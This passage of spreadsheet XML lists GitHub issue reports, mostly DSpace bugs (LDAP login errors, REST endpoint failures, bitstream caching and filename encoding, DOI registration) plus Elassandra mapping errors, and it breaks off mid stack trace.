    <t>When I try to login via LDAP, this keeps failing with this error:  2021-03-25 11:16:29,930 ERROR org.springframework.boot.web.servlet.support.ErrorPageFilter @ Forwarding to error page from request [/api/authn/login] due to exception [Index 1 out of bounds for length 1] java.lang.ArrayIndexOutOfBoundsException: Index 1 out of bounds for length 1 at org.dspace.authenticate.LDAPAuthentication.assignGroups(LDAPAuthentication.java:699) ~[dspace-api-7.0-beta5-SNAPSHOT.jar:7.0-beta5-SNAPSHOT] at org.dspace.authenticate.LDAPAuthentication.authenticate(LDAPAuthentication.java:265) ~[dspace-api-7.0-beta5-SNAPSHOT.jar:7.0-beta5-SNAPSHOT] at org.dspace.authenticate.AuthenticationServiceImpl.authenticateInternal(AuthenticationServiceImpl.java:108) ~[dspace-api-7.0-beta5-SNAPSHOT.jar:7.0-beta5-SNAPSHOT] at org.dspace.authenticate.AuthenticationServiceImpl.authenticate(AuthenticationServiceImpl.java:80) ~[dspace-api-7.0-beta5-SNAPSHOT.jar:7.0-beta5-SNAPSHOT] at org.dspace.app.rest.security.EPersonRestAuthenticationProvider.authenticateNewLogin(EPersonRestAuthenticationProvider.java:97) ~[classes/:7.0-beta5-SNAPSHOT] at org.dspace.app.rest.security.EPersonRestAuthenticationProvider.authenticate(EPersonRestAuthenticationProvider.java:71) ~[classes/:7.0-beta5-SNAPSHOT]  I have not configured any authentication-ldap.login.groupmap option (as I thought I won't need them). But apparently LDAPAuthentication does not work properly without this option.</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/3284</t>
  </si>
  <si>
    <t>OAI response contains wrong URL for bitstream</t>
  </si>
  <si>
    <t>**Describe the bug** The xoai document contains the old style bitstream URL with unreplaced place holder instead that the new one **To Reproduce** Steps to reproduce the behavior: 1. check the xoai response of any record that contains files 2. https://api7.dspace.org/server/oai/request?verb=GetRecord&amp;metadataPrefix=xoai&amp;identifier=oai:demo7.dspace.org:10673/248 3. the url looks like `&lt;field name="url"&gt;bitstream.baseUrl/bitstream/10673/248/1/Video-Based%20Solution-Focused%20Brief%20Coaching.pdf&lt;/field&gt;` **Expected behavior** The bitstream URL should work, the right one is https://demo7.dspace.org/bitstreams/b54bc2e4-e37d-4418-a108-79314f95f5a3/download</t>
  </si>
  <si>
    <t xml:space="preserve">bitstream isuue not api related </t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/3440</t>
  </si>
  <si>
    <t>[DS-62] Not right encoding for license and extracted texts - ID: 2234532</t>
  </si>
  <si>
    <t>&lt;i&gt;Imported from JIRA &lt;a href="https://jira.lyrasis.org/browse/DS-62"&gt;[DS-62]&lt;/a&gt; created by bollini&lt;/i&gt; &lt;p&gt;This cyrillic text displaed in ISO-8859-5 but need in UTF-8 (looked on&lt;br/&gt; server - this texts in right UTF-8).&lt;br/&gt; This in Firefox 3.0.1&lt;br/&gt; Tested also with browsers IE 6, Amaya - also wrong.&lt;/p&gt; &lt;p&gt;Maybe problem with right encoding in header&lt;/p&gt; &lt;p&gt;Followups:&lt;br/&gt; &amp;#8212;&lt;br/&gt; Date: 2009-03-04 12:18&lt;br/&gt; Sender: bollini&lt;br/&gt; Hi,&lt;br/&gt; DSpace doesn't set explicity an header for the license so the&lt;br/&gt; configuration of your Apache enviroments drives the browser behaviour.&lt;br/&gt; Anyway, because the license files are written by DSpace, and DSpace doc&lt;br/&gt; requires Tomcat to run with the jdk option file.encoding=UTF-8 I think that&lt;br/&gt; should be appropriate to force the utf8 encoding in license content-type.&lt;br/&gt; So you can fix this issue editing the content-type in bitstream format&lt;br/&gt; registry appending "; charset=utf-8" to the MIME Type of the second row&lt;br/&gt; (License)&lt;/p&gt;</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/3713</t>
  </si>
  <si>
    <t>[DS-338] Bitstream download allows caching of content that requires authorization to read</t>
  </si>
  <si>
    <t>&lt;i&gt;Imported from JIRA &lt;a href="https://jira.lyrasis.org/browse/DS-338"&gt;[DS-338]&lt;/a&gt; created by lcs&lt;/i&gt; &lt;p&gt;The XMLUI requests to retrieve the contents of a Bitstream set an "Expires" header in the response with a very long time, which itself looks like a bug (the time is 60 hours, when the intent appears to be 1 hour). The other problem with this is that it sets "Expires:" even when the content is only accessible through authorization, which results in the following bug caused by aggressive browser caching: (this works best with a Bitstream that renders in the browser, such as an image or plain text)&lt;/p&gt; &lt;p&gt;1. Clear browser history (in Firefox 3, use Tools-&gt;Clear private data dialog)&lt;br/&gt; 2. Logout of DSpace UI if logged in.&lt;br/&gt; 3. Attempt to view a Bitstream that does not have anonymous READ access; you'll be redirected to the Login page.&lt;br/&gt; 4. Login, get redirected to the Bitstream. Observe that its URL is the DSpace home page, however, e.g.&lt;br/&gt; &lt;a href="http://dspace.my.edu/xmlui" class="external-link" target="_blank" rel="nofollow noopener"&gt;http://dspace.my.edu/xmlui&lt;/a&gt;&lt;br/&gt; 5. If you check your browser's cache at this point (visit URL about:cache?device=disk in Firefox3) observe that the content of this page is cached with an expiry time of 60 hours from now.&lt;br/&gt; 6. Now go to another page such as &lt;a href="http://dspace.my.edu/xmlui/community-list" class="external-link" target="_blank" rel="nofollow noopener"&gt;http://dspace.my.edu/xmlui/community-list&lt;/a&gt; and click "Logout".&lt;br/&gt; 7. Visit the home page (without trailing /) &lt;a href="http://dspace.my.edu/xmlui" class="external-link" target="_blank" rel="nofollow noopener"&gt;http://dspace.my.edu/xmlui&lt;/a&gt; and observe you're looking at the protected Bitstream. &lt;/p&gt; &lt;p&gt;The attached patch fixes this behavior by skipping the "Expires:" response header completely when the Bitstream is not anonymously readable. It also shortens the cache time to 1 hour, which will still prevent frequent reloads from loading the server.&lt;/p&gt;</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/7126</t>
  </si>
  <si>
    <t>[DS-3779] REST 7 BistreamFormats endpoint throws error when searching based on id</t>
  </si>
  <si>
    <t>&lt;i&gt;Imported from JIRA &lt;a href="https://jira.lyrasis.org/browse/DS-3779"&gt;[DS-3779]&lt;/a&gt; created by JonasVg&lt;/i&gt; &lt;p&gt;Currently, the calls done to the bitstreamformats that use the id return an error, even if the actual id exists&lt;br/&gt; eg:&lt;br/&gt; As we can see in this call, there are actually bitstreamformats present&lt;br/&gt; &lt;a href="https://tinyurl.com/yby4vkco" class="external-link" target="_blank" rel="nofollow noopener"&gt;https://tinyurl.com/yby4vkco&lt;/a&gt;&lt;br/&gt; BUT, for example, the endpoint bitstreamformats/1&lt;br/&gt; &lt;a href="https://tinyurl.com/yawmpdej" class="external-link" target="_blank" rel="nofollow noopener"&gt;https://tinyurl.com/yawmpdej&lt;/a&gt;&lt;br/&gt; throws an error&lt;/p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> bug</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/7946</t>
  </si>
  <si>
    <t>DSpace 6.x REST API /registries/schema endpoint incorrectly handles fields without qualifiers</t>
  </si>
  <si>
    <t>**Describe the bug** The [DSpace 6.x REST API](https://wiki.lyrasis.org/display/DSDOC6x/REST+API) has an endpoint that allows you to get information about metadata fields in the registry. DSpace does not handle metadata fields without qualifiers properly, for example `dc.title` or `dc.contributor`, and returns HTTP 500 to the user. It logs the following to `dspace.log`: console ERROR org.dspace.rest.MetadataRegistryResource @ Field dc.title. not found  These fields obviously exist, and they are visible in the `dc` schema registry: https://demo.dspace.org/rest/registries/schema/dc ~~This probably affects DSpace 4 and 5 as well, since the REST API is the same code.~~ The registries endpoint was added in DSpace 6. **To Reproduce** Make a request to the `/rest/registries/schema/` endpoint for a metadata field without a qualifier, for example: - https://demo.dspace.org/rest/registries/schema/dc/metadata-fields/title - https://demo.dspace.org/rest/registries/schema/dc/metadata-fields/contributor **Expected behavior** An HTTP 200 response with information about the metadata field, for example `dc.contributor.advisor`: - https://demo.dspace.org/rest/registries/schema/dc/metadata-fields/contributor/advisor</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/7992</t>
  </si>
  <si>
    <t>Scripts and processes bug</t>
  </si>
  <si>
    <t>The REST code for the scripts and processes does not take into account the "hasArg" value of the configured script options. Instead, the REST API only exposes the option type. I believe angular will then use this option type to force an argument or not depending on the type. When the type is a String, which is the default type, an argument will be forced. As a consequence, when no argument needs to be provided, the type needs to be changed to a boolean as is done [here](https://github.com/DSpace/DSpace/blob/main/dspace-api/src/main/java/org/dspace/app/bulkedit/MetadataImportScriptConfiguration.java#L62). This is very unintuitive when adding configuration for new scripts. This bug was noticed in the [review of the harvest script](https://github.com/DSpace/dspace-angular/pull/1328#pullrequestreview-775425176). **Expected behavior** Ideally, the converter should set the type to boolean when no other type is provided and when there should be no argument provided for the parameter instead of having to set the type manually for every parameter. **Related work** This issue was noticed when reviewing the [Control collection harvest from the UI PR](https://github.com/DSpace/dspace-angular/pull/1328).</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/8023</t>
  </si>
  <si>
    <t>DSpace 7.0: Bitstream download filename lose non-latin characters</t>
  </si>
  <si>
    <t>**Describe the bug** When download a bitstream having filename with character other than latin, those characters will be missing in file save dialog. For example, file named " File.pdf", will be saved as " File.pdf" This happen only on 7.0, 6.x and earlier handle this properly. **To Reproduce** Steps to reproduce the behavior: 1. Running DSpace 7.0 on Tomcat 9.0 2. Upload a file to and item with non-latin character in file name, e.g. " File.pdf" 2. Download the file from DSpace 7.0 UI 3. Browser will suggest save file name " File.pdf" instead of the correct " File.pdf" **More Information** This happen because HttpHeadersInitializer does not encode filename in Content-Disposition header. It just use the file name as is. Since HTTP header (or Tomcat?) does not support UTF8, all non-latin characters become "?" in the header. In contrast, DSpace 6.x encode filename in Content-Disposition header by using MimeUtility.encodeText(name, "UTF8", "B"); **Discussion** Although encoding filename work fine in earlier version of DSpace, I am wondering if the proper solution should be using filename* which can indicate character encoding?</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/8479</t>
  </si>
  <si>
    <t>Regular search can contain private &amp; withdrawn items</t>
  </si>
  <si>
    <t>**Describe the bug** Regular search contains withdrawn and private items (if logged in as admin), these should probably only appear in the admin search. This is I think blocked for regular users with because of the lack of `read:g{AnonGroup}` solr field in the docs for private/withdrawn items. Since if fix/migrate from https://github.com/DSpace/DSpace/pull/8438 is not applied, then withdrawn items are visible for all/anon. **To Reproduce** Logged in as admin: - [[regular search for withdrawn item](https://demo7.dspace.org/search?query=cce2a443-c792-465e-9fd5-2cbf9aec2e68)](https://demo7.dspace.org/search?query=cce2a443-c792-465e-9fd5-2cbf9aec2e68) =&gt; Contains withdrawn item [[Ancient Greece](https://demo7.dspace.org/items/cce2a443-c792-465e-9fd5-2cbf9aec2e68)](https://demo7.dspace.org/items/cce2a443-c792-465e-9fd5-2cbf9aec2e68) in regular search result - Idem [[regular search for private item](https://demo7.dspace.org/search?query=68e9ec51-38cf-4549-937d-fb8ea8194551)](https://demo7.dspace.org/search?query=68e9ec51-38cf-4549-937d-fb8ea8194551) =&gt; Contains private item [[Testing Example.](https://demo7.dspace.org/items/68e9ec51-38cf-4549-937d-fb8ea8194551)](https://demo7.dspace.org/items/68e9ec51-38cf-4549-937d-fb8ea8194551) in regular search result **Expected behavior** Private or withdrawn items should not appear in regular search regardless of which user sees results. They should only appear in admin search (where there are sidebar filters/facets for them) **Proposed solution** Easiest solution: add `-withdrawn:true AND -discoverable:false` filter in default `DiscoveryConfiguration` in `defaultFilterQueries` property [[here](https://github.com/DSpace/DSpace/blob/main/dspace/config/spring/api/discovery.xml#L202-L207)](https://github.com/DSpace/DSpace/blob/main/dspace/config/spring/api/discovery.xml#L202-L207) Since there is a separate "unDiscoverableItems" config which contains the opposite [[here](https://github.com/DSpace/DSpace/blob/main/dspace/config/spring/api/discovery.xml#L480)](https://github.com/DSpace/DSpace/blob/main/dspace/config/spring/api/discovery.xml#L480) I think it is assumed that this functionality is default. **Related** If fix/migrate from https://github.com/DSpace/DSpace/pull/8438 is not applied, then withdrawn items are visible for all users.</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/8494</t>
  </si>
  <si>
    <t>Deleting bitstreams via the 6.x REST API leaves empty bundles</t>
  </si>
  <si>
    <t>Deleting the last bitstreams in a bundle via the REST API on DSpace 6.4 (including on demo.dspace.org) from either the `DELETE /items/{item id}/bitstreams/{bitstream id}` or `DELETE /bitstreams/{bitstream id}` endpoints leaves the bundle itself and the link between the bundle and the item, which results an empty bundle in the item bitstreams. This is mostly harmless but causes XMLUI to show a broken thumbnail. To reproduce the bug, add a bitstream in a bundle, then delete it through the REST API (all the item bitstreams in a bundle must be deleted): bash curl -X DELETE '{DOMAIN}/rest/bitstreams/{BITSTREAM_ID}' -H 'Cookie:JSESSIONID={JSESSIONID}'  The behavior can be confirmed by either looking at the `item2bundle` table in the database, which will show that the bundle is still there or from the XMLUI bitstreams edit form. **After deleting the last ORIGINAL bitstream (XMLUI edit bitstreams form):** &lt;img width="868" alt="Screen Shot 2022-09-29 at 2 23 21 PM" src="https://user-images.githubusercontent.com/20943086/193020060-8d05988e-d785-4ddc-80c6-f8352d27aa46.png"&gt; **After deleting the last THUMBNAIL bitstream (XMLUI edit bitstreams form):** &lt;img width="855" alt="Screen Shot 2022-09-29 at 2 27 41 PM" src="https://user-images.githubusercontent.com/20943086/193020084-a00b1837-c924-4fb2-8d7a-3e0dd779baea.png"&gt; **After deleting the last THUMBNAIL bitstream (XMLUI item view):** &lt;img width="824" alt="Screen Shot 2022-09-29 at 2 28 19 PM" src="https://user-images.githubusercontent.com/20943086/193020118-a963c951-12c7-40bd-b0f3-bdc26d527d15.png"&gt; The suggested fix is to delete the bundle when there are no remaining bitstreams. https://github.com/DSpace/DSpace/pull/8497</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/8732</t>
  </si>
  <si>
    <t>Default filter always applies in Register DOI via Item status page in UI</t>
  </si>
  <si>
    <t>**Describe the bug** It was my understanding that the functionality of registering doi via the item status page should always bypass any default filter defiened in the DOIIdentifierProvider bean (identifier-service.xml config) by applying the TrueFilter. I am seeing something very odd when trying this functionality and looking at the logs (I have added some additional logging). It looks like Truefilter is being checked twice, and an additional check is run that uses the default filter:  Before request [POST /server/api/pid/identifiers] originated from /items/69a962a1-0af5-4323-94f2-646fd500d8c5/edit/register-doi org.dspace.identifier.DOIIdentifierProvider @ Check filter: class org.dspace.content.logic.TrueFilter org.dspace.identifier.DOIIdentifierProvider @ Result of filter for 1810/347135 is true  org.dspace.identifier.DOIIdentifierProvider @ Check filter: class org.dspace.content.logic.TrueFilter org.dspace.identifier.DOIIdentifierProvider @ Result of filter for 1810/347135 is true org.dspace.identifier.DOIIdentifierProvider @ Check filter: class org.dspace.content.logic.DefaultFilter org.dspace.content.logic.condition.IsArchivedCondition @ Result of isArchived is true org.dspace.content.logic.condition.IsWithdrawnCondition @ Result of isWithdrawn is false org.dspace.content.logic.condition.InCollectionCondition @ item 1810/347135 is in collection 1810/294790, returning true org.dspace.identifier.DOIIdentifierProvider @ Result of filter for 1810/347135 is false org.dspace.app.rest.exception.DSpaceApiExceptionControllerAdvice @ An exception has occurred (status:500) java.lang.IllegalStateException: Failed to register identifier: null at org.dspace.app.rest.repository.IdentifierRestRepository.registerDOI(IdentifierRestRepository.java:248)  In the UI, I get the error message banner twice, and I can see two API calls in the developer tools. Is the method somehow being called multiple times? **To Reproduce** Steps to reproduce the behavior: 1. Log in as admin and choose an archived item without a DOI 2. Go to Edit item &gt; Item status 3. Click on Register DOI 4. Confirm DOI registration **Expected behavior** The registration always takes place, bypassing any default identifier filters **Related work** Link to any related tickets or PRs here.</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/8765</t>
  </si>
  <si>
    <t>Reset Password does not work from the Admin Panel when Captcha verification enabled</t>
  </si>
  <si>
    <t>**Describe the bug** When I am logged in as admin and try to reset a password for another eperson, it will throw an error: Error when trying to reset password An error occured when attempting to reset the password for the account associated with the following email address: 213523@ids.upchiapas.edu.mx. The same behavior encountered also in the DSpace 7.5 DEMO website. **To Reproduce** Steps to reproduce the behavior: 1. MUST have [Google Recaptcha](https://wiki.lyrasis.org/display/DSDOC7x/CAPTCHA+Verification) enabled to reproduce this bug. 2. Log in as Admin 3. Go to Access Control -&gt; People -&gt; Edit a Person -&gt; Reset Password Related: The Bug was first described in #https://github.com/DSpace/DSpace/issues/8670 However, the angular fix (#2107) did not resolve the problem. In the Network Tab, I see how the request is sent properly (with the correct parameter =forgot), but the Backend responds with 403 Forbidden. Maybe is something in the backend that should be changed as well?</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/8792</t>
  </si>
  <si>
    <t>Exporting search results via CSV using a *very* long search query fails</t>
  </si>
  <si>
    <t>**Describe the bug** Exporting search results via CSV using a *very* long search query fails without specifying the problem. Searching itself works, but when trying to export the reults an error is shown. The query (like all process parameters) is inserted into the `public.process` table, into the column `parameters`. This column is limited to 512 characters, causing the process creation to fail. **To Reproduce** Steps to reproduce the behavior: 1. Open the search page: https://demo7.dspace.org/search 2. Enter a llong search query (&gt; 512 characters) 3. Click search 4. Search results are shown 5. Click the CSV export button 6. The export fails with the error message "Starting the export has failed" **Expected behavior** The export should export the results as usual or document and display the limitation to users. **Related work** This is similar to the issue: #8730, fixed in #8755</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/8888</t>
  </si>
  <si>
    <t>Shibboleth login leads to an error page when logging in with spaces in a GET request</t>
  </si>
  <si>
    <t>**Describe the bug** If you do a search with a space in it, for example "testing turbine" &amp; then logging in with shibboleth will result in a "Unauthorized, status=401" error. **To Reproduce** Steps to reproduce the behavior: 1. Go to the following page: https://demo7.dspace.org/search?query=testing%20turbine 2. Then login with shibboleth **Expected behavior** Login should work. **Related work** Link to any related tickets or PRs here.</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/8920</t>
  </si>
  <si>
    <t>LDAP authentication is broken if groupmaps are enabled</t>
  </si>
  <si>
    <t>**Describe the bug** LDAP authentication is broken if groupmaps are enabled in `dspace/config/modules/authentication-ldap.cfg`. DSpace version is 7.6. **To Reproduce** Steps to reproduce the behavior: 1. Configure and enable LDAP authentication in `dspace/config/modules/authentication-ldap.cfg` 2. Test that LDAP login is working 3. Enable at least one groupmap, for example: `authentication-ldap.login.groupmap.1 = OU=MYORG:MYORG_LDAP_USERS` 4. Test LDAP login again 5. DSpace frontend displays "Invalid email or password" message and the following error and stack trace are shown in dspace.log: &lt;details&gt; &lt;summary&gt;dspace.log&lt;/summary&gt; &lt;pre&gt;&lt;code&gt;2023-06-26 19:42:56,476 INFO unknown unknown org.dspace.authenticate.LDAPAuthentication @ anonymous::auth:attempting trivial auth of user=jsmith 2023-06-26 19:42:57,326 ERROR unknown unknown org.springframework.boot.web.servlet.support.ErrorPageFilter @ Forwarding to error page from request [/api/authn/login] due to exception [Cannot invoke "java.util.ArrayList.iterator()" because "group" is null] java.lang.NullPointerException: Cannot invoke "java.util.ArrayList.iterator()" because "group" is null at org.dspace.authenticate.LDAPAuthentication.assignGroups(LDAPAuthentication.java:730) ~[dspace-api-7.6.jar:7.6] at org.dspace.authenticate.LDAPAuthentication.authenticate(LDAPAuthentication.java:273) ~[dspace-api-7.6.jar:7.6] at org.dspace.authenticate.AuthenticationServiceImpl.authenticateInternal(AuthenticationServiceImpl.java:108) ~[dspace-api-7.6.jar:7.6] at org.dspace.authenticate.AuthenticationServiceImpl.authenticate(AuthenticationServiceImpl.java:80) ~[dspace-api-7.6.jar:7.6] at org.dspace.app.rest.security.EPersonRestAuthenticationProvider.authenticateNewLogin(EPersonRestAuthenticationProvider.java:130) ~[classes/:7.6] &lt;/code&gt;&lt;/pre&gt; &lt;/details&gt; **Expected behavior** Login should succeed. **Related work** This seems to be a regression from: - https://github.com/DSpace/DSpace/pull/8814 I have tested reverting that patch, both with groupmaps enabled and disabled, and LDAP login works in both cases.</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/9667</t>
  </si>
  <si>
    <t>Request-a-copy link has subpath stripped from dspace.ui.url</t>
  </si>
  <si>
    <t>In a dspace instance configured to run at a subpath, that subpath is stripped when request-a-copy link is generated here: https://github.com/DSpace/DSpace/blob/87f66fbc55cf2b8f8e265d74ce2c902ac2ee7e26/dspace-server-webapp/src/main/java/org/dspace/app/rest/repository/RequestItemRepository.java#L300 URIBuilder.setPathSegments removes any exiting path segments from the base url before adding the new segments.</t>
  </si>
  <si>
    <t>https://github.com/DSpace/DSpace/issues/10053</t>
  </si>
  <si>
    <t>COAR Notify: fixes to Request endorsement pattern implementation to fully adhere to the Notify implementation v1.0</t>
  </si>
  <si>
    <t>## Describe the bug The current implementation of COAR Notify in DSpace &gt;= 8.x for the COAR Request endorsement pattern does not fully adhere to the COAR Notify specification (https://coar-notify.net/specification/1.0.0/). Overall, the current implementation works really well, and the proposed fixes are relatively minor. The fixes have been implemented and tested in collaboration with the PCI Service (Peer Community In) which has a full Notify implementation already available, and currently being used by other repositories such as CSIC (Spain) and HAL (France). As a result, the PR associated with this issue will provide fixes to make the implementation fully adhere to Notify 1.0 specification, as well provide a workflow that supports integration with the PCI endorsement services. List of identified issues 1. The current implementation assumes communications between the repository and the endorsement service will be machine to machine (i.e. the offer notification sent by the repository has the actor hardcoded to being the repository service - see https://github.com/DSpace/DSpace/blob/fc544a830987782d90d22c747e12a42ccf9926d7/dspace/config/ldn/request-endorsement#L20) Instead, the endorsement service expects an email address id in the form **mailto:email@example.org"** (e.g. the email and name of the submitter in the actor property) 2. Acknowledgement notifications: the current implementation in DSpace requires that the type property in received notifications includes both a **type (Accept, Reject, etc.)** as well as including the **coar-type (e.g. coar-type:RequestEndorsement)**. If the coar-type is not set, DSpace returns a null pointer error and notifications fails. See https://coar-notify.net/specification/1.0.0/accept/ where the type property is required and must be Accept, in the case of an Accept ack, and so on. Instead, the DSpace implementation could look for the coar-type (as it currently does), and if not present, it should look at inReplyTo property of the received notification and fetch the coar-type from the original notification (coar-type presence is required in the Offer notification, https://coar-notify.net/specification/1.0.0/request-endorsement/). If none present, then it should fail as expected. 3. Acknowledgement notifications the current DSpace implementation requires that the context property is present in received notifications, and uses this to find the associated DSpace object. The presence of context in ack notifications is optional (e.g. https://coar-notify.net/specification/1.0.0/accept/, the "context" property is not even mentioned for ack notifications). Therefore DSpace should follow the same approach as in 2.: if the context property is not present, then find it from the object in the associated inReplyTo notification. ## To Reproduce Steps to reproduce the behaviour: To reproduce the behaviour it is needed to set up a connection with PCI's staging/test environment ## Expected behaviour The service should allow to specify whether it requires the repository actor to be an email address, and ideally this should be done via configuration. The most simple implementation could make use of the submitter's email address and name (this approach would require less modifications to the database tables). A more flexible approach (that may not be needed) could allow the submitter to specify an email address (e.g. different to DSpace's submitter email address). The implementation should fully adhere to the current Notify implementation as per description in 2. and 3. ## Related work PR will be coming shortly</t>
  </si>
  <si>
    <t>https://github.com/strapdata/elassandra/issues/7</t>
  </si>
  <si>
    <t>Build string on ES startpage is empty</t>
  </si>
  <si>
    <t xml:space="preserve">error show build numer:  { "name" : "abc", "cluster_name" : "Test Cluster", "version" : { "number" : "2.1.2", "build_hash" : "${buildNumber}", "build_timestamp" : "NA", "build_snapshot" : true, "lucene_version" : "5.3.1" }, "tagline" : "You Know, for Search" } </t>
  </si>
  <si>
    <t>https://github.com/strapdata/elassandra/issues/65</t>
  </si>
  <si>
    <t>java.io.IOException: from is a reserved keyword</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour Vincent, Using latest build, I am attempting to create custom index mapping including object types resulting in a faceted issue - filing them together as they seem two faces of the same coin so to speak.  java.io.IOException: from is a reserved keyword  PUT watcher { "mappings": { "watch": { "properties": { "id": { "type": "string", "index": "not_analyzed" }, "condition": { "type":"object", "enabled": false }, "input": { "type":"object", "enabled": false }, "transform": { "type":"object", "enabled": false } } } } }  followed by a document creation attempt:  PUT watcher/watch/test_watch_random { "disabled": false, "id": "test_watch_random", "trigger": { "schedule": { "later": "every 5 minutes" } }, "input": { "search": { "request": { "index": [], "body": {} } } }, "condition": { "script": { "script": "payload.hits.total &gt; 100" } }, "transform": {}, "actions": { "email_admin": { "throttle_period": "15m", "email": { "to": "alarm@localhost", "from": "sentinl@localhost", "subject": "Sentinl Alarm", "priority": "high", "body": "Found {{payload.hits.total}} Events" } } } }  The first response of Elassandra is:  { "error": { "root_cause": [ { "type": "runtime_exception", "reason": "java.io.IOException: from is a reserved keyword" } ], "type": "runtime_exception", "reason": "java.io.IOException: from is a reserved keyword", "caused_by": { "type": "i_o_exception", "reason": "from is a reserved keyword", "caused_by": { "type": "configuration_exception", "reason": "from is a reserved keyword" } } }, "status": 500 }  with logs:  2016-12-26 08:51:11,257 WARN [elasticsearch[127.0.0.1][http_server_worker][T#3]{New I/O worker #53}] BytesRestResponse.java:134 convert path: /watcher2/watch/test_watch_random, params: {index=watcher2, id=test_watch_random, type=watch} java.lang.RuntimeException: java.io.IOException: from is a reserved keyword at org.elassandra.cluster.InternalCassandraClusterService$BlockingActionListener.waitForUpdate(InternalCassandraClusterService.java:1820) at org.elassandra.cluster.InternalCassandraClusterService.blockingMappingUpdate(InternalCassandraClusterService.java:1842) at org.elassandra.cluster.InternalCassandraClusterService.upsertDocument(InternalCassandraClusterService.java:1879) at org.elassandra.cluster.InternalCassandraClusterService.insertDocument(InternalCassandraClusterService.java:1852) at org.elasticsearch.action.index.TransportXIndexAction.innerExecute(TransportXIndexAction.java:85) at org.elasticsearch.action.index.TransportIndexAction.doExecute(TransportIndexAction.java:120) at org.elasticsearch.action.index.TransportIndexAction.doExecute(TransportIndexAction.java:66) at org.elasticsearch.action.support.TransportAction.execute(TransportAction.java:137) at org.elasticsearch.action.support.TransportAction.execute(TransportAction.java:85) at org.elasticsearch.client.node.NodeClient.doExecute(NodeClient.java:58) at org.elasticsearch.client.support.AbstractClient.execute(AbstractClient.java:359) at org.elasticsearch.client.FilterClient.doExecute(FilterClient.java:52) at org.elasticsearch.rest.BaseRestHandler$HeadersAndContextCopyClient.doExecute(BaseRestHandler.java:88) at org.elasticsearch.client.support.AbstractClient.execute(AbstractClient.java:359) at org.elasticsearch.client.support.AbstractClient.index(AbstractClient.java:371) at org.elasticsearch.rest.action.index.RestIndexAction.handleRequest(RestIndexAction.java:105) at org.elasticsearch.rest.BaseRestHandler.handleRequest(BaseRestHandler.java:54) at org.elasticsearch.rest.RestController.executeHandler(RestController.java:198) at org.elasticsearch.rest.RestController.dispatchRequest(RestController.java:158) at org.elasticsearch.http.HttpServer.internalDispatchRequest(HttpServer.java:153) at org.elasticsearch.http.HttpServer$Dispatcher.dispatchRequest(HttpServer.java:101) at org.elasticsearch.http.netty.NettyHttpServerTransport.dispatchRequest(NettyHttpServerTransport.java:451) at org.elasticsearch.http.netty.HttpRequestHandler.messageReceived(HttpRequestHandler.java:61) at org.jboss.netty.channel.SimpleChannelUpstreamHandler.handleUpstream(SimpleChannelUpstreamHandler.java:70) at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:564) at org.jboss.netty.channel.DefaultChannelPipeline$DefaultChannelHandlerContext.sendUpstream(DefaultChannelPipeline.java:791) at org.elasticsearch.http.netty.pipelining.HttpPipeliningHandler.messageReceived(HttpPipeliningHandler.java:60) at org.jboss.netty.channel.SimpleChannelHandler.handleUpstream(SimpleChannelHandler.java:88) at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:564) at org.jboss.netty.channel.DefaultChannelPipeline$DefaultChannelHandlerContext.sendUpstream(DefaultChannelPipeline.java:791) at org.jboss.netty.handler.codec.http.HttpChunkAggregator.messageReceived(HttpChunkAggregator.java:145) at org.jboss.netty.channel.SimpleChannelUpstreamHandler.handleUpstream(SimpleChannelUpstreamHandler.java:70) at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:564) at org.jboss.netty.channel.DefaultChannelPipeline$DefaultChannelHandlerContext.sendUpstream(DefaultChannelPipeline.java:791) at org.jboss.netty.handler.codec.http.HttpContentDecoder.messageReceived(HttpContentDecoder.java:108) at org.jboss.netty.channel.SimpleChannelUpstreamHandler.handleUpstream(SimpleChannelUpstreamHandler.java:70) at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:564) at org.jboss.netty.channel.DefaultChannelPipeline$DefaultChannelHandlerContext.sendUpstream(DefaultChannelPipeline.java:791) at org.jboss.netty.channel.Channels.fireMessageReceived(Channels.java:296) at org.jboss.netty.handler.codec.frame.FrameDecoder.unfoldAndFireMessageReceived(FrameDecoder.java:459) at org.jboss.netty.handler.codec.replay.ReplayingDecoder.callDecode(ReplayingDecoder.java:536) at org.jboss.netty.handler.codec.replay.ReplayingDecoder.messageReceived(ReplayingDecoder.java:435) at org.jboss.netty.channel.SimpleChannelUpstreamHandler.handleUpstream(SimpleChannelUpstreamHandler.java:70) at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:564) at org.jboss.netty.channel.DefaultChannelPipeline$DefaultChannelHandlerContext.sendUpstream(DefaultChannelPipeline.java:791) at org.elasticsearch.common.netty.OpenChannelsHandler.handleUpstream(OpenChannelsHandler.java:75) at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:564) at org.jboss.netty.channel.DefaultChannelPipeline.sendUpstream(DefaultChannelPipeline.java:559) at org.jboss.netty.channel.Channels.fireMessageReceived(Channels.java:268) at org.jboss.netty.channel.Channels.fireMessageReceived(Channels.java:255) at org.jboss.netty.channel.socket.nio.NioWorker.read(NioWorker.java:88) at org.jboss.netty.channel.socket.nio.AbstractNioWorker.process(AbstractNioWorker.java:108) at 